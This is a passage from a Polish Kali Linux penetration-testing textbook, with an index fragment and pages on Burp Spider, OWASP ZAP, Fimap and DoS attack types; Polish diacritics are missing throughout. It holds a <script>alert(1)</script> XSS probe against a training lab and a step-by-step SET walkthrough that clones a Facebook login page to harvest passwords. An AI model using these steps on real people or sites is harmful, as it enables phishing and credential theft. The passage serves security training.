IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
